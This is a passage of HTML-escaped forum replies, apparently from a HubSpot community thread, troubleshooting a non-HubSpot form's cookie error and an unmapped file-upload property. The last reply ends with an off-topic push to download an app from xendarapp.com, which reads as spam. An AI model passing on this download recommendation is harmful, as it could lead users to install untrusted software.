&lt;P&gt;From your screenshots, it looks like you're using a non-HubSpot from and the &lt;A href="https://knowledge.hubspot.com/forms/use-non-hubspot-forms" target="_blank"&gt;&lt;STRONG&gt;non-HubSpot Forms tool&lt;/STRONG&gt;&lt;/A&gt;. The no cookie error is telling us something on your page is blocking the HubSpot Tracking code from setting the cookie properly. But you'll need a dev or dev resources to look at your page and see if you can spot the issue. This part of the knowledge base covers &lt;A href="https://knowledge.hubspot.com/forms/pop-up-forms-and-non-hubspot-forms-faq#:~:text=Some%20common%20reasons%20why%20HubSpot%20would%20not%20be%20able%20to%20capture%20submissions%20on%20forms%20are" target="_blank"&gt;&lt;STRONG&gt;some common reasons your form submission may not work&lt;/STRONG&gt;&lt;/A&gt;. The limitation is that with external pages and forms, there are too many variables out of HubSpot's control to list all the potential causes.&amp;nbsp;&lt;/P&gt;

Is this only happening from your tests? Or with actual external submissions as well? Troubleshooting steps will include examining the console logs and other browser information in the browser's developer tools when you make a submission. This may revel an error or issue that is blocking your tracking form coming through.&amp;nbsp;&lt;/P&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;For the second screenshot, it's telling us your property name is correct. Either file_upload has a different internal value or it's associated with a different, non-contact, object in your portal. You can verify this by going to Settings &amp;gt; Properties &amp;gt;contacts and searching for the property. Once you find it, you can locate its internal name. I made quick example (screenshot)&amp;nbsp;&lt;/P&gt;

      <description>&lt;P&gt;It sounds like the issue might be with how the file upload field is mapped to the contact record in HubSpot. If the field isn’t properly connected, the file won’t be stored or accessible when you click the submission. I’d recommend checking your form settings to make sure the upload field is mapped to a property that supports file attachments.&lt;/P&gt;&lt;P data-unlink="true"&gt;In general, once everything is configured correctly, HubSpot should handle file sharing between candidates and your team automatically — meaning the uploaded files get stored and can be viewed directly from the contact record without errors. Is the error or the issue still persist you can use can visit the website xendarapp.com to download the app to resolve the issue.&lt;/P&gt;</description>
